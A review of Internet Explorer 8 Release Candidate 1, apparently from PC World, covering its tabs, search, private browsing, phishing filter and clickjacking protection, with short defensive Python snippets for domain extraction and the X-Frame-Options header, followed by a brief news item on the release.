Microsoft's updated browser, Internet Explorer 8, promises an assortment of new features designed to help make Web browsing with IE safer, easier, and more compatible with Internet standards. We looked at the first release candidate of the new browser released to the public today, Release Candidate 1 (RC1). On the surface, IE 8 seems to be a lot like IE 7, but Microsoft has made a number of changes under the hood. You may have seen some of these new features already, however, in IE's no-longer-upstart competitor, Mozilla Firefox 3.
Tabbed Browsing

If you accidentally close a browser window in IE 8, you can opt to restore it when you reopen the program (just as you can in Firefox). IE 8 will use color coding to group related tabs together. If you open a link from pcworld.com in a new tab, for example, it will open adjacent to the original tab, and the tabs themselves will have a matching color. You can move tabs from one group to another, but if you have three unrelated pages open, you cannot create a group out of them.
Perhaps the most novel addition in IE 8 is what Microsoft calls tab isolation. The feature is designed to prevent a buggy Web site from causing the entire Web browsing program to crash. Instead, only the tab displaying the problematic page will close, so you can continue browsing.
Of course, IE 8 RC1 retains some of the features introduced in the first beta, including WebSlices and accelerators; see "Updated Web Browsers: Which One Works Best?" for more details.
Searching

IE 8 can use multiple search engines besides Windows Live Search, and you can add other search engines to the mix. Also, IE 8 will give you search suggestions as you type. For example, I can type in 'PC World' into the search field, and IE 8 RC1 will give me Live Search suggestions such as 'pc world magazine' or 'pc world reviews'. In addition, IE 8 lets you switch between search engines on the fly by clicking an icon at the bottom of the search field's drop-down menu. IE 8 can search Yahoo and Ask.com, and you can install add-ins that give IE 8 the capability to search Wikipedia, Amazon, and the New York Times, among other sites.
Improved Security
Microsoft touts IE 8 as its most secure browser to date, and Microsoft has indeed added a good number of security features to the mix, ranging from phishing detection to private browsing, plus a new feature to prevent clickjacking, an emerging data theft threat.
IE 8 RC1 includes two security features under the 'InPrivate' label: InPrivate Browsing and InPrivate Filtering. Both existed in earlier prerelease versions of IE 8, but IE 8 RC1 lets you use the two features separately, whereas before each relied on the other.
If you enable IE 8's InPrivate Browsing feature, the browser will not save any sensitive data--passwords, log-in info, history, and the like. Afterward it will be as if your browsing session had never happened. This feature is very similar to Private Browsing in Apple's Safari browser, except that an icon in IE's address bar makes InPrivate Browsing's active status more obvious.
InPrivate Filtering--called InPrivate Blocking in earlier IE 8 builds--prevents sites from being able to collect information about other Web sites you visit. This feature existed in IE 8 Beta 2, but you could use it only while using InPrivate Browsing. In RC1, you can use InPrivate Filtering at any time.
The browser's phishing filter--called SmartScreen--improves on its predecessor's filter with such features as more-thorough scrutiny of a Web page's address (to protect you from sites named something like paypal.iamascammer.com) and a full-window warning when you stumble upon a suspected phishing site. SmartScreen relies largely on a database of known phishing sites, so new, unknown phishing sites may slip through the cracks.
IE 8 displays sites' domains in a darker text color, so you can more readily see whether you're visiting a genuine ebay.com page, say, or a page simulating an eBay page on some site you've never heard of. Microsoft could still put a little more emphasis on the domain name (using a different color background, for example), but the highlighting is a welcome addition.
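The underlying check is simple to illustrate. This naive Python sketch pulls out the registrable domain the way the highlighting emphasizes it; real browsers consult the Public Suffix List rather than just taking the last two labels, so treat this purely as an illustration.

from urllib.parse import urlparse

def registrable_domain(url):
    """Naively return the last two labels of the hostname."""
    host = urlparse(url).hostname or ""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host

print(registrable_domain("http://paypal.iamascammer.com/login"))  # iamascammer.com
print(registrable_domain("http://www.ebay.com/item"))             # ebay.com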
Finally, IE 8 RC1 includes a feature designed to prevent clickjacking, an attack in which a malicious page invisibly frames or overlays another site so that visitors' clicks are hijacked, potentially exposing their information. When you use IE 8 to view a page that attempts this against a protected site, IE 8 can identify the attempted clickjacking and will warn you of the attempt.
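The protection is opt-in: a site declares that its pages must never be framed via the X-Frame-Options response header that IE 8 introduced. Here is a minimal sketch of a server sending that header, using Python's standard library purely for illustration:

from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        # Tell the browser this page may never be rendered inside a frame,
        # which defeats clickjacking overlays in browsers honoring the header.
        self.send_header("X-Frame-Options", "DENY")
        self.end_headers()
        self.wfile.write(b"<html><body>Not frameable.</body></html>")

if __name__ == "__main__":
    HTTPServer(("localhost", 8000), Handler).serve_forever()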
Web Compatibility
Creating a site that looks identical in Internet Explorer, Firefox, and Safari can be a challenge. IE 8 offers better support for W3C Web standards--a set of guidelines developed to ensure that a Web page appears the same in all browsers. The downside is that IE 8 will break some pages designed for earlier Internet Explorer versions.
To counteract this problem, Microsoft has added a compatibility mode: Click a button in the toolbar, and IE 8 will display a page in the same way that IE 7 does. In my testing, I found that most pages worked fine with the standard (new) mode, and that most errors were minor cosmetic ones. Unfortunately, the Compatibility Mode toggle button may not be obvious to most users, because it's pretty small; a text label would have helped.
Though it probably won't convince many Firefox users to jump ship, Internet Explorer 8 Release Candidate 1 shows promise, and may be worth considering for people who have not yet solidified their browser loyalties. (Keep an eye out for our report on the final release of IE 8.)
more....
Microsoft on Monday released a near-final "release candidate" version of Internet Explorer 8, the next version of its Web browser.
The software maker plans to say more on its Web site around noon, but, as noted by enthusiast site Neowin, the code is already available from Microsoft's download center.


With IE 8, Microsoft is hoping to regain some lost ground by adding features such as private browsing, improved security, and a new type of add-ons, called accelerators.
On the security front, Microsoft is adding a cross-site scripting filter, as well as protections against a type of attack known as clickjacking.
In an interview, IE General Manager Dean Hachamovitch said there will be little change between the release candidate and the final version, though he declined to say when the final version will be released.
"The ecosystem should expect the final candidate to behave like the release candidate," Hachamovitch said.
Internet Explorer 8 will work with Windows XP (Service Pack 2 or later) and Windows Vista. A version of IE 8 is also being built into Windows 7.
However, the IE code in Windows 7 is a pre-release candidate version.
"Windows 7 enables unique features and functionality in Internet Explorer 8 including Windows Touch and Jump Lists which require additional product tests to ensure we are providing the best Windows experience for our customers," the software maker said in a statement. "Microsoft will continue to update the version of Internet Explorer 8 running on Windows 7 as the development cycles of Windows 7 progress.